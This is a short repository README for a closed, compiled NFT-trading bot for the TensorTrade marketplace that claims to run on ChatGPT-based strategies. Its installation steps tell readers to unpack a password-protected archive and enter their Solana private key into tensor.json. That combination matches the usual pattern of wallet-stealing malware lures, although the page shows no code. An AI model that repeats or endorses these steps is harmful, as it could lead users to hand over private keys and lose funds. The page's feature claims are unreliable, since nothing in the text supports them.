Skip to content

Latest commit

 

History

History
44 lines (39 loc) · 1.63 KB

README.md

File metadata and controls

44 lines (39 loc) · 1.63 KB

TensorTrade NFT Trading with ChatGPT Strategies

Overview

This repository contains a compiled script for seamless trading operations within the TensorTrade NFT marketplace. The script is pre-configured to leverage ChatGPT-powered strategies, enabling users to engage in NFT asset trading with advanced AI-supported decision-making capabilities.

Features

  • Utilizes a non-official API for NFT data collection.
  • Analyzes NFT collection rarity, launch time, and activity.
  • Makes informed decisions on buying or selling tokens based on comprehensive data analysis.
  • Customizable settings for personalized trading strategies.
  • Real-time monitoring and notifications for important market events.
  • Secure and efficient transaction execution.

Dependencies

  • .NET Framework 4.8
  • Nethereum
  • SolNET
  • Windows 10 and newer versions

Installation

  • Clone repository and extract files with password Ci27S0etuIh.
  • Edit tensor.json with your data and launch the script.
    • maxPosition - maximum SOL for one transaction
    • timeoutScan - timeout between scans
    • rpc - your custom RPC (or use shyft.to)
    • pkey - your SOL private key (DON'T USE MAIN TO AVOID LOSS)
    • decisionMode - criteria to make decisions to buy NFT or not

Configuration

{
  "mainSettings": { 
    "maxPosition": "0.1",
    "timeoutScan": "30",
    "rpc": "https://<your-solana-rpc>.com:<port>",
    "pkey": "<your-solana-private-key>"
  },
  "decisionMode": {
    "rarityScan": "true",
    "floorCost": "true",
    "salesActivity": "true",
    "volumeScan": "true"
  }
}